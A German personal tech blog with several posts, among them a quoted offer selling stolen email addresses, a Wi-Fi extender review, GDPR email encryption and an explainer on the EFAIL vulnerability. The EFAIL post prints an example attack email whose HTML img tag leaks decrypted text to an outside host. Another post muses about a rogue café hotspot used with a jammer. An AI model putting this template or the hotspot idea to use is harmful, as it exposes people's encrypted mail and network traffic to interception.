Preise von Emails

Was einem so alles in die Inbox trudelt 😀 Ich hatte vor fast genau 4 Jahren mal die Preise für Facebookfreunde gepostet, jetzt kam eine Wunschvorstellung für Emailadressen rein :

Guten Tag,

Ich verkaufe Emails!

Die Datenbank setzt sich wie folgt zusammen:

@gmx.de 9,6 Millionen Emails
@web.de 7,2 Millionen Emails
@t-online.de 8,8 Millionen Emails
@gmx.net 3,2 Millionen Emails
@freenet.de 4,2 Millionen Emails
@bluewin.ch 2,2 Millionen Emails

1 Million Emails kosten 1000 Euro

Ich akzeptiere als Zahlungsmittel nur bitcoin wenn Ihr also keine Bitcoins habt kontaktiert mich auch nicht!

Es kann auch nicht verhandelt werden die Preise sind fix!

Falls ich Ihr Interesse geweckt habe können Sie mich wie folgt auf Jabber kontaktieren.

Meine Jabber-ID manux(at)jabber.ru (at) durch @ ersetzen.

Wenn Sie nicht wissen was Jabber ist dann laden Sie sich erstmal pidgin herunter und erstellen Sie Ihre eigene Jabber-ID

Unser Freund hier will tatsächlich 1.000 € für 1 Million Adressen haben 🙂 Bisschen happig der Preis. Aber gut, natürlich nur als Bitcoin, soweit ok, weil den kann man ja quasi in beliebig kleine Teile aufteilen, aber der Kontaktweg.. Autsch! Runterladen und installieren.. hmm.. naja.. vielleicht.. Aber eine eigene Jabber-ID erstellen, das wird todsicher für die meisten „Kunden“ ein unlösbares Problem werden 😀

Zu was nützlicherem als illegal erworbenen Emailadressen

Schauen wir uns doch diese Spambewertung an:

 Pkte Regelname              Beschreibung
 ---- ---------------------- --------------------------------------------------
  1.0 SPF_SOFTFAIL           Senderechner entspricht nicht SPF-Datensatz (softfail)
  0.0 FREEMAIL_FROM          Sender email is commonly abused enduser mail provider
                             (kxhllj[at]outlook.com)
  1.1 MIME_HTML_ONLY         BODY: MIME-Nachricht besteht nur aus HTML
  0.0 HTML_MESSAGE           BODY: Nachricht enthält HTML
  0.1 MISSING_MID            Missing Message-Id: header
  0.6 HTML_MIME_NO_HTML_TAG  Nachricht besteht nur aus HTML, hat aber kein
                             "html"-Element
  0.0 LOTS_OF_MONEY          Huge... sums of money

„LOTS OF MONEY“ Ich finde das Kriterium sollte mehr als nur 0.0 Punkte Scoren. Wie viele bekommen schon echte Emails, in denen es um Millionen geht 😉

„SPF_SOFTFAIL“ sollte auch mehr wiegen, weil die Absende Domain nicht zum Server paßt, von der die Email gesendet wurde. Ein typisches Zeichen für Spam, auch wenn Admins so einen SPF Eintrag gelegentlich auch verhunzen können.

Eine fehlende Message ID… soso… eigentlich auch ein sehr gutes Zeichen für SPAM. Echte EMails ohne Message ID würde man wohl auf die Whitelist setzen, weil man sich die selbst schickt.

Was komplett fehlt: Eine Spmassassin Regel für „Zig tausend Freemailadressen im CC:“ 😀 Das nächste mal dann bitte per BCC eintragen, weil per CC ist das ein Datenverbrechen nach EU DS GVO 😉

Ich denke, die Spamassassin-Regeln sollten mal überarbeitet werden, dann flexxen die auch wieder mehr Mails weg.

Wie üblich, in die digitale Tonne damit!

DS GVO: Email Transportverschlüsselung wird Pflicht sein

Willkommen im Chaos des Datenschutzes. Ich hatte ja schon lange den Verdacht, daß EMails auch nur noch mit TLS übertragen werden dürfen, wenn man zum Datenschutz verpflichtet ist. Dabei habe ich mich aber immer gewundert, wieso das nie in der Presse steht. Jetzt wird sich das hoffentlich hektisch ändern.

Die Meinungen zur TLS Verschlüsselung von Emails

Wie uns Rechtsanwalt Schwartmann auf seiner Webseite wissen läßt, ist ab Freitag aufgrund der Datenschutz Grundverordnung wahrscheinlich eine TLS Verschlüsselung für eingehende und ausgehende Emails Pflicht, sofern man ein Unternehmen betreibt oder aus anderen Gründen zum Datenschutz verpflichtet ist.

Nach Ansicht des Landesbeauftragten für Datenschutz und Informationsfreiheit Nordrhein-Westfalen ist eine Transportverschlüsselung auf jeden Fall erforderlich:
Bezüglich der sicheren Implementierung der Transportebene hat das Bundesamt für Sicherheit in der Informationstechnologie die Technische Richtlinie „BSI TR-03108-1: Secure E-Mail Transport“ herausgegeben.
Unter datenschutzrechtlichen Gesichtspunkten ist diese Richtlinie als Stand der Technik zu betrachten, so dass ihre Umsetzung eine notwendige Voraussetzung für die datenschutzkonforme E-Mail-Kommunikation ist.

Quelle: https://www.rechtsanwalt-schwartmann.de/verschluesselungspflicht/
„(Ende Zitat)

Die Bundesbeauftragte für den Datenschutz und die Informationsfreiheit hat uns heute morgen endlich wissen lassen, daß nur der Einsatz von TLS 1.2 in Frage kommt:

„Inwieweit ein Provider, der die Infrastruktur zur Verfügung stellt, eine Option anbieten muss, die ausschließlich den Empfang von TLS 1.2 transportverschlüsselten E-Mails zulässt, beurteilt sich nach dem gegenwärtigen Stand der Technik.

Der gegenwärtige Stand der Technik ist, daß TLS 1.2 seit 2008 das Maß der Dinge ist. Der Nachfolger TLS 1.3 wird aber bald kommen, da die Planung des Standards kürzlich beendet wurde. Das hält aber gerade den BUND, wo die Information her ist, nicht davon ab, auch heute noch mit TLS 1.0 zu senden 😀 (Böser Dienstleister vom Bundmailserver 😉 )

IMHO

Ich schließe mich dieser Meinung an, da auch ich die DS GVO so interpretiere, daß alle Kommunikationskanäle verschlüsselt sein müssen. Wie einfach das gehen kann, zeigt folgende Anleitung :

Zunächst mal wählen wir im Account unter „Mailserver“ die „EMail-Options“ aus:

Nun aktivieren wir die beiden obersten Punkte:

„Verbindung zum Server benötigt Verschlüsselung“ und „Empfangener Mailserver muß TLS benutzen“

Das war es dann auch schon, jetzt kommen nur noch TLS gesicherte EMails an den Mailserver ran. Damit entspricht das Mailserververhalten dem geltenden Datenschutzrecht.

Wer es ganz genau nehmen will, der müßte auch noch DANE implementieren, da dies in einer BSI Richtlinie zum Thema gefordert wird. Da DANE aber AFAIK noch nicht 100% ausgereift ist, könnte der Teil schwierig werden, was nicht heißt, das einige Provider dies nicht schon implementiert hätten.

Bei Exim ist grade eine passende Diskussion gestartet worden.

Quellenlinks:

https://www.ldi.nrw.de/mainmenu_Aktuelles/Inhalt/Technische-Anforderungen-an-technische-und-organisatorische-Massnahmen-beim-E-Mail-Versand/Technische-Anforderungen-an-technische-und-organisatorische-Massnahmen-beim-E-Mail-Versand.html

https://www.rechtsanwalt-schwartmann.de/verschluesselungspflicht/

https://www.bsi.bund.de/DE/Publikationen/TechnischeRichtlinien/tr03108/index_htm.html

Was passiert eigentlich, wenn …

… man ein Laptop mit einer verstärkenden WLAN Antenne in einem Cafe aufbaut, einen nicht geschützten Hotspot startet und dann einen Störsender einsetzt, um alle anderen Kanäle zu blockieren? Die Polizei kommt deswegen jedenfalls nicht, das ist schon mal klar 😀

Man muß die anderen Kanäle nicht mal „stören“, das brutal starke extra aufgemotzte eigene Signal sollte eigentlich schon reichen, wenn es so über die Kanäle streicht. Alle Handies in Reichweite sollten sich dann eigentlich sofort ins eigene Netz verbinden, weil es das stärkste ist und „das andere“ ( z.b. vom Hotspot des Cafes ) überlagert.

Wird bestimmt spannend, wenn das mal jemand durchzieht.

Dutzende von Spionagecellen in Washington gefunden

Das NBC Channel 4 Nachrichten Team hat da mal eine kleine Exkursion in Washington gemacht und dabei über 40 Sting-Rays gefunden. Das sind Geräte die Mobilfunkmasten simulieren. Das macht eine Regierung normalerweise und das Handy von Verdächtigen abzuhören, aber in Washington macht das wohl jeder. Scheint ne Art Volkssport zu sein, besonders um Botschaften herum 😀 Da trackt jeder jeden 😉

„Das News4 I-Team bat Turner, mit einer speziellen Software, die auf drei Handys mit drei verschiedenen Carriern geladen war, durch die Hauptstadtregion zu fahren, um die Geräte (Sting-Rays) an verschiedenen Orten zu erkennen.

„Wenn man also diese roten Balken sieht, sind das sehr verdächtige Ereignisse“, sagte Turner.

Wenn Sie in oder in der Nähe des Distrikts wohnen, wurde Ihr Telefon wahrscheinlich irgendwann verfolgt, sagte er.

Ein kürzlich veröffentlichter Bericht des Ministeriums für Heimatschutz nannte die Spionagegeräte ein echtes und wachsendes Risiko.“ (Übersetzt mit www.DeepL.com/Translator)

Das Nachrichten Team war sich sicher, daß es noch viel mehr finden würde, wenn Sie noch einige Stunden rumkurven würden. Ich glaube, daß mache hier in Berlin auch mal irgendwann 😀

Quelle: https://www.nbcwashington.com/investigations/Potential-Spy-Devices-Which-Track-Cellphones-Intercept-Calls-Found-All-Over-DC-Md-Va-482970231.html

Super-Pflanze könnte CO2 Problem lösen

Das wir eine globale, vom Menschen verursachte Erwärmung haben, wird außer der Präsidentenkarikatur Trumph wohl keiner mehr abstreiten. Pläne, wie man das verhindern kann, gibt es einige, aber alle kosten viel Geld, basieren auf Technologie und sind bestenfalls kurzfristige Lösungen, weil Sie das Problem nicht lösen, sondern die Auswirkungen verzögern.

Natürlich könnten wir als Menschheit das Problem sofort lösen, indem wir auf die Emission von CO2 verzichten und uns damit in die Steinzeit zurückschleudern. Selbstverständlich wollen die Meisten das nicht und deswegen brauchen wir eine andere Lösung:

„Joanne Chory, eine Pflanzenbiologin und Genetikerin, ist Direktorin des Labors für Molekular- und Zellbiologie der Pflanzen am Salk Institute for Biological Sciences und Preisträgerin des Durchbruchspreises. Sie hat die Initiative „Harnessing Plants for the Future“ ins Leben gerufen, um eine Superpflanze zu entwickeln, die sowohl Nahrung liefert als auch Kohlendioxid in ihren Wurzeln speichert.“ (Übersetzung: Deepl.com )

Korkeichen atmen auf

„In Ihren Wurzeln ?“ werdet Ihr fragen. Ja, das ist so.. Wurzeln werden von Pflanzen wasserdicht gemacht. Dazu bilden die Pflanzen eine korkartige Verbindung namens „Suberin“ . Suberin ist ein pflanzliches hydrophobes (wasserabweisend) Biopolymer, das in Zellwänden eingelagert ist. Frau Chory möchte nun eine Pflanze züchten, die besonders viel davon Bildet um so viel CO2 zu verbrauchen. Die oberflächlich sichtbare Pflanze soll dabei als Tierfutter dienen, wenn Sie nach einigen jahren geerntet wird.

Geschätzt wird, daß es aufgrund der klassischen Zuchtmethode min. 10 Jahre dauert, bis die Pflanze da ist, wo sie hin soll. Das liegt daran, daß die meisten Menschen ( zu recht ) Angst vor der Gentechnik haben. Mit Hilfe der Genscherentechnik  CRISPR würde es deutlich schneller gehen.

Wenn alle Ziele erreicht würden, könnte diese Pflanze ausgebracht auf einer Fläche von Ägypten ~50% der derzeitigen Weltemission an CO2 abbauen und damit das „Problem“ elegant lösen.

Wer nicht glaubt, daß es funktioniert, was glaubt Ihr eigentlich welches Co2 Ihr da mit Eurem Auto grade in die Luft blast ? Das stammt von Pflanzen, die im Karbon oder Perm Zeitalter vor 250 bis 350 Millionenjahren gewachsen sind. Außerdem weiß man aus früheren Zeitaltern, daß erhöhte CO2 Werte in der Atmosphäre bei Pflanzen ganz von alleine zu Riesenwuchs führen, was u.a. wiederum zu Riesendinos geführt hat 🙂 Da so ein Dino einige hundert Kilo am Tag gefuttert hat, muß das ja auch nachgewachsen sein, sonst wären die Dinos verhungert. Da diese Form aber Millionen von Jahren existierte, muß der Biokreislauf funktioniert haben.

Warum sollte das also nicht nochmal funktionieren. Platz gibt es schließlich genug. Wenn man die Pflanze eh schon züchtet, kann Sie auch gleich auf Wüste getrimmt werden. Wichtig wäre nur, daß die Pflanze nicht schneller wächst, als wir die notfalls niederbrennen können. Wir wissen ja schließlich wie schnell so ein Experiment schief gehen kann 😉

Mehr dazu gibt es im Quellenlink.

Quelle: https://thebulletin.org/plant-could-save-civilization-if-we-let-it11826

Google News Lean & Clean

Google News hat mal wieder das Layout angepaßt. Blöd nur, daß man jetzt ohne Javascript nicht mal mehr die News aufrufen kann. Da Google da wohl nicht viel ändern wollen wird, da Sie die Kontrolle über das Tracking verlieren würden, ist also jetzt Schluß mit Google News. RIP.

Hmmm.. oder nicht ? Könnten findige Leute einen Weg gefunden haben ? Ja, hat er 😉

Wenn Ihr Google News so benutzen wollt, wie das mal gedacht war, dann abboniert es per RSS Feed,  aber nicht in einem RSS Feedreader, denn so gewinnt Ihr nichts. Natürlich wird ein Script das Abholen und die ganzen Google Umleitungsurls extrahieren dürfen.

Nun, das Script schreiben dauerte 15 Minuten, funktioniert 1a und Google ist bis als Lieferant komplett raus. Praktischerweise kann ein Handy RSS Reader das auch abonnieren, womit das auf dem Handy dann auch sauber geht.

Xiaomi Mi WIFI Extender 2

Oh .. wo fangen wir bei der Sache am besten an ? Vielleicht der Historie folgen .. na.. ah.. ok, ist wohl das beste.

Das war letzte Woche …

„Zssszzzzzzzzzzzs…“ machte die Tello über mir, aber mein Handy sagte „Nein. Hier fliegt keine Tello rum.“ Öh. Der Überkopfflug meiner neusten Anschaffung machte ein Verbindungsabbruch je zu nichte. Die Drohne hing in 10m über dem Abflugrasen fest in der Lust. Vermutlich würde sie von alleine runterkommen, wenn der Strom zu Neige ginge. Der Akku der Ryze DJI Tello hält aber locker 12 Minuten durch. Was machen ?

Der dezente Hinweis, man möge doch einfach näher an die Drohne ran gehen, konnte mich nicht begeistern. Vor zwei Jahren hatte ich mal ganz übel eine nicht vorhandene Stufe betreten wollen und die anschließende Luftnummer war gar nicht angenehm gewesen. 10m bis zur Drohne rauf ? Keine Chance zu Fuß.  Dronatello stand dagegen wie eine Eins in der Luft und wollte dort offenkundig nicht so schnell weg.

Ein beherztes „Hände hoch, Du bist umzingelt“, samt Handy versteht sich, brachte eine Verkürzung auf 8m Luftlinie und damit einen Reconnect des WLANs, über das die Tello Drohne gesteuert wird. Damit konnte die Drohne dann wieder überredet werden näher zu kommen. Faszinierend an der Sache ist, daß die Drohne horizontal 150m weit kommen kann ( ohne andere WLANs die stören ) aber nach 10m Steigflug hart vom Radar verschwindet.

Eine physikalische Erklärung  als erfahrener Funkamateur, der mit selbstgebauten Antennen bis zum Mittelmeer gekommen ist, kann ich dazu nicht abgeben. Das 2.4 GHZ WLAN der Drohne ist nicht gerichtet, also müßte es ohne zu murren 10m senkrecht reichen. Das Handy scheidet auch aus,  denn die Antenne kann man nach Belieben drehen, also auch kein Faktor. Es könnte höchstens sein, daß die Elektronik so blöde im Boden der Drohne angebracht ist, daß diese das WLAN Signal 90 Grad nach unten abschirmt.  Das bisschen Plastikgehäuse, daß die Motoren am Platz hält, scheidet als Störfaktor jedenfalls aus 🙂

Jetzt kann die Tello nur 10m hoch fliegen, weil die Firmware das als Hardlimit drin hat, aber die 150m theoretischen Meter sind jetzt auch nicht der Brüller, zumal die Liveübertragung der Kamera zum Handy stark entfernungsabhängig ist und einfach öfter bei 50m aussetzt. (Ja, bei den vielen WLANs hier, kein Wunder.)  Was tun ?

Na gut, Schritt 0 war die Drohne zu hacken und die 10m Begrenzung zu entfernen, aber darum solls nicht gehen 😀

Xiaomi Mi WIFI Extender 2

Ein Video auf Youtube später hatte ich einen Xiaomi Mi WIFI Extender 2 für rund 13 € bestellt. Das hätte ich mal lieber nicht getan. Was mich das Teil an Nerven gekostet hat, wo es doch „nur“ mal das WLAN der Drohne erweitern sollte, könnt Ihr kaum glauben. Heute war es soweit, der DHL Mitarbeiter unseres Vertrauens brachte das „gute“ Stück.

Ausgepackt & Eingesteckt waren eine Bewegung. Mist, der USB Port ist nicht breit genug.. anderen Port nehmen.

Schritt 1 – Konfigurieren

Ok, der ist an. Jetzt Konfigurieren, aber wie ?  Verbinden wir uns doch mal in das neue WLAN, da wird man schon einen Webdienst haben, der das erledigt und uns auch gleich noch das neue WLAN konfigurieren läßt.

Ja, sooooooo einfach hätte es sein können. War es aber nicht 🙁

Schritt 2 – Handy App installieren

Der  Connect ins WLAN war zwar möglich, aber außer einem TELNET Port ohne Zugangsdaten, war NICHTS da.  Also mußte eine HANDY App her, die ALLE und noch ein paar MEHR Android Rechte einforderte! Wirklich ALLE! Wenn ich ALLE sage, meine ich auch ALLE, sogar welche, die es offiziell gar nicht gibt!

Wer mein Blog liest, der weiß, daß ich das nicht zulassen würde. Habe ich auch nicht. Dafür gibt es APPGUARD von SRT. Man installiert erstmal die fragliche App, dann sagt man AppGuard, daß die APP überwachen soll, der baut die neuzusammen, löscht das Original und installiert die geänderte App wieder ins System. Dann kann man die Rechte des Programms so downgraden wie man es für nötig hält.

In meinem Fall war das „Alles – ( WLAN & GPS )“ . Nun startete die App zwar, aber das Handy hing durch, was den Installationsprozess der Sache mal locker auf 10 Minuten verlängert hat, pro Versuch versteht sich 😉

Schritt 3 – App starten

Natürlich wollte diese chinesische Spionage App, deren Name hier nicht genannt werden soll, nicht einfach den Router suchen, nönö, die wollten auch noch das drittgeborene Kind, die Seele meiner Frau und alles was die Datenschutzbestimmung der EU explizit verbietet, also einen Cloud-Login. Ächts.. Na gut, Fake Adresse erzeugt, Weiterleitung auf echte Email angelegt, registriert. Lustigerweise wollte nie jemand wissen, wem der Account denn gehört. In China reicht wohl eine Nummer, oder dieser mysteriöse Telnetport auf dem Device aus.

Schritt 4 – Router suchen

und suchen und suchen und wenn ich nicht gestorben bin, sucht die App noch heute..

Was war der Fehler ? Die App hatte gefragt, wo ich bin, also sagte ich Europa. Ich hätte CHINA sagen sollen, denn Mikrosekunden nach der Umstellung auf die Location China Mainland, war der Extender gefunden 😀

Schritt 5 – Konfigurieren

Ja, das war dann die nächste Pleite. Der Extender wurde zwar gefunden, ich konnte dem auch noch sagen, welches Netz er klonen soll, aber das wars dann auch schon. Der Klonkrieg wurde nie erfolgreich beendet.

4 Stunden sind seit dem DHL Paketabwurf vergangen, Hürden wurden gemeistert, Apprechte gebrochen, Privatssphären sind für immer im Digitalen Dickicht verschütt gegangen, aber der Repeater repeatete nicht. Oder doch?

Ma guggen.. Hey, da ist ja son komisches neues Netz das .. TELLO_PLUS .. ob das … vielleicht.. Drohne an, App an, altes Tello Netz gelöscht, neues Tello Netz verbunden.. Scheisse.. ein BILD!! ich habe ein BILD.. und weg 😀  WTF.. Dronatello hatte sich abgeschaltet, dem wars zu blöd geworden, wie affig lange der Extender braucht um zu connecten.

3 Versuche später, ohne LAPTOP, das zu Debuggzwecken und Telnethacks mitlief, gings dann irgendwann doch.

Fazit

TUT ES EUCH NICHT AN. Nehmt ein Laptop, benutzt das als REPEATER, das hält auch länger und spioniert Euch nicht aus! ganz ehrlich, die 13 € war das NICHT WERT!

Ob es das 10m Problem löst, weiß ich bis heute noch nicht 😀

EFail: Die Katze ist aus dem Sack

Die Katze ist aus dem Sack, das Whitepaper zur EFAIL Schwachstelle ist bekannt. Als Entwickler auch von komplexen Programmen zum Parsen von (auch abgedrehten) Formaten, kann ich Euch sagen, daß es genug Scheisse da draußen gibt, die man fehlertolerant behandeln kann, aber die EFAIL Schwachstelle ist genau das : EIN MEGAFAIL!

Selbstgemachtes GPG Schwachstellen Logo 🙂

EFail – Der MEGAFAIL

Der Exploit basiert darauf, daß man eine verschlüsselte Email an den Empfänger A abgefangen hat, diese aber nicht dekodieren kann. Das bleibt auch nach der Lücke so! Also PGP/GPG sind an sich fein raus, die haben gar keine Schuld an der Sache.

Nun bettet man den verschlüsselten Block der Mail in eine Multipart-Mime Message, die aus zwei HTML und einem Cipherblock (dem verschlüsselten Mailteil) besteht. Das könnte so aussehen:

From: <unverdächtig@kenneich.de>
To: <opfer@opfer.de>
Content-Type: multipart/mixed;boundary="GRENZE"

--GRENZE
Content-Type: text/html;charset=ascii

<html><body><img src="https://efail.de/
--GRENZE
Content-Type: application/pkcs7-mine;smine-type=enveloped-data
Content-Transfer-Encoding: base64

hQIMA+PS/5obaKVzARAAuG0PvUFHEzRp+U9HAm1GgjnUwy6afP60q0QYl9vWby5h
ysIVpoXrHZqn3H8f/+FjsoZ2YpDlCqhvKzn/UaP8kxb21YN1+eSaMi55b6WFyIif
hbxnp2Z155YM6Sx+VrTa55DQEF2c7LzyFKcE1csRiB0py+bWJKFPERRhXxSVOMpv
sZB3oLcZmBS990RgjbGUUZhXClxubwwqXo3K41Wj8kktQvZ7YD6hMz46V26kN4Ru
PLt1PQ/+P0iznlNjXaIckLXUq/RNpRMC5469Dp674OECZ2kc3fFrv5zkZcs0Kg5r
...
--GRENZE
Content-Type: text/html;charset=ascii

"></body></html>
--GRENZE--

Was jetzt passiert ist, daß der Mimeparser des Emailprogramms, den verschlüsselten Block vom PGP Plugin dekodieren läßt und nahtlos in das umgebende HTML einfügt. Es kommt dann eine URL raus wie => „https://efail.de/TEXT+DER+NACHRICHT+AN+DEN+EMPFÄNGER“, welche als Bild in dem HTML eingebettet ist, was die meisten Mailprogramme dazu bringt, diese sofort zu rendern. Also schickt der Client damit eine Bildanfrage und überträgt so die dekodierte Nachricht.

Voraussetzungen

1. Man braucht eine verschlüsselte Email an den Empfänger
2. Man braucht einen Webserver, der mehr als 512 Zeichen in der URL annimmt ( selbstschreiben vermutlich)
3. Man braucht ein Emailprogramm beim Opfer, dessen Parser von einem Irren geschrieben wurde
UND 4. das ungefragt Bilder von externen unbekannten Webseiten nachlädt.

1+2 kann der Angreifer liefern, 3+4 muß das Opfer beisteuern.

Der Pressetenor

Der allgemeine Pressetenor war heute, daß die Plugins einen Bug haben. Wenn aber obiges so zutrifft, dann haben die Plugins keinen BUG, sie sind nur zwingend notwendig, daß der Angriff automatisch ablaufen kann. Schaltet man die aus, läuft der Angriff ins Leere.

Was in einigen Webseiten aber abgeleitet wurde war, daß die Verschlüsselung geknackt wurde und das trotz monatelanger Vorwarnung, die Emailprogramme keinen Schutz dagegen gefunden haben.

Das aber ist LÄCHERLICH.

Hier wird wiedermal eine Sau durchs Dorf getrieben, die es nicht verdient hat. Ja, das Ganze ist ein Bug. Ja, der ist in der Wirkung echt schlimm. Nein, die Verschlüsselung wurde nicht geknackt, die wurde nur vom Emailprogramm automatisch aufgehoben und exfiltriert und genau da liegt der Hund begraben. Wie kann man nur einen Parser bauen, der die drei Teile einer Email, die als DREI Teile in der Email vorliegen, zu einem Teil zusammen fassen? Das ist die Frage.

Die, die den Parser geschrieben haben, der die drei Teile verbindet, die sollten ihre Studiengebühren zurück bekommen, sofern sie welche gezahlt haben!

Schlimmer ist nur noch, daß mindestens drei unterschiedliche Teams den gleichen Fehler gemacht haben.

Updates

Thunderbird wird erst mit einer Version 52.8 nicht mehr verwundbar sein. Ich nehme mal an, die Version kommt jetzt etwas zügiger raus, als geplant.

GPG Pluginschwachstellen

Was bekommt man, wenn man von einer tollen Sicherheitslücke liest, ein lustiges Bild sieht und einen Bug im Grafikprogramm meldet ?

Selbstgemachtes GPG Schwachstellen Logo 🙂

Na ist doch klar, nur Platz #3 in der Reihenfolge der Websites, die über die Schwachstelle berichten 😀

Kurzfassung

Deswegen auch jetzt nur die Kurzfassung: Außer der EFF und dem ForscherSebastian Schinzelaus Münster, weiß noch keiner, was die gefunden haben. Sie empfehlen aber trotzdem die Plugins für Thinderbird & Co. zu entfernen.

Ich vermute, daß man eine Email bauen kann, die den Plugins Kryptoanweisungen unterjubelt, welche die Ausführen  und an den Absender zurück schicken. Ansonsten müßte man ja nicht davor warnen, daß die installiert sind. Vor GPG/PGP an sich, wird ja nicht gewarnt, nur davor die Plugins zu benutzen. Die Autoren müssen auch alles Code aus der gleichen Quelle geklaut haben, weil sonst nicht AppleMail, Outlook und Thunderbird gleichermaßen betroffen wären.

Aber bislang ist das reine Spekulation. Warten wir auf mehr…

Upates: (12:08)

Und da haben wir auch schon den ersten Collateralschaden:

http://www.tagesschau.de/inland/e-mail-verschluesselung-101.html

Die Tageschauredakteure haben die Meldung komplett auf Links gedreht und verbreiten grade, daß die Verschlüsselung gekackt wurde. Leider VERKACKT Leute 😀 Nicht die Verschlüsselung wurde geknackt, sondern die Plugins sind ausnutzbar um auf die verschlüsselten Emails zuzugreifen. Das genau sollen die zwar können, aber nicht, wie ich annehme, fremdbestimmt 😉

Wahrheit: 0  Collateral: 1

Upates: (14:04)

Die Katze ist aus dem Sack. Die Plugins in den Emailprogrammen dekodieren eingebettete Ciphertexte in HTML Emails und leiten die dekodierten Inhalte via HTML Bildlink zu einem eigenen Server aus.
War ja klar, daß die Krypto nicht das Problem sein konnte.

Voraussetzung für so einen Angriff ist aber, daß der Angreifer den verschlüsselten Text einer an das Opfer gesendeten Email hat. Alles-Überwacher wie die NSA haben sowas natürlich auf Lager liegen.

… und so gings weiter …. EFail: Die Katze ist aus dem Sack